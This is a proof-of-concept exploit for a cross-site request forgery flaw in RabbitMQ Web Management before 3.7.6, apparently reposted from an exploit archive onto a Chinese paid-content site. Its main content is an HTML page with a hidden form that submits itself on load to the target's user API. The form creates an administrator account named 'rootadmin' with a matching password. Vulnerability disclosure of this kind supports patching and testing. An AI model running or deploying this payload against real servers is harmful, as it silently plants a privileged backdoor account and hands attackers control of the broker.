44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt

# Exploit Title: RabbitMQ Web Management < 3.7.6 - Cross-Site Request Forgery
# Date: 2018-06-17
# Author: Dolev Farhi
# Vendor or Software Link: www.rabbitmq.com
# Version: 3.7.6
# Tested on: Ubuntu

<html>  
<h2>Add RabbitMQ Admin</h2>

<body>
<form name="rabbit" id="rabbit" action="http://Target/api/users/rootadmin" method="POST">
<input type="hidden" name="username" value="rootadmin" />
<input type="hidden" name="password" value="rootadmin" />
<input type="hidden" name="tags" value="administrator" />
<input type="submit"  value="save" />
</form>

<script>
  window.onload = rabbit.submit()
</script>

</body>
</html>

 

44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt-棉花糖会员站
44902_RABBITMQ Web Management 3.7.6-跨站点请求伪造(添加管理员)-Linux WebApps exploit.txt
此内容为付费阅读,请付费后查看
9999积分
付费阅读
已售 8
© 版权声明
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容